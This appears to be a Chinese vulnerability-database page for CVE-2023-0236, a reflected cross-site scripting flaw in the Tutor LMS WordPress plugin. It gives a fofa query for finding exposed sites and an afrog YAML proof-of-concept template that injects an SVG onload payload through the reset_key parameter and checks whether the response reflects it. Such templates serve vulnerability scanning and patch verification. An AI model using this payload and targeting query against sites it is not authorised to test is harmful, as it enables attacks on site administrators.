CVE-2023-0236: Tutor LMS < 2.0.10 - Cross Site Scripting WordPress

日期: 2025-08-01 | 影响软件: Tutor LMS | POC: 已公开

漏洞描述

The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. fofa: app="Tutor LMS"

PoC代码[已公开]

id: CVE-2023-0236

info:
  name: Tutor LMS < 2.0.10 - Cross Site Scripting  WordPress
  author: 不动明王
  severity: medium
  verified: true
  description: |-
    The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and 
    escape the reset_key and user_id parameters before outputting then back 
    in attributes, leading to Reflected Cross-Site Scripting which could be used 
    against high privilege users such as admin.
    fofa: app="Tutor LMS"
  reference:
    - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8

rules:
  r0:
    request:
      method: GET
      path: /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd
    expression: response.status == 200 && response.body.bcontains(b"<svg onload=prompt(document.domain)>") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2023-0236.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐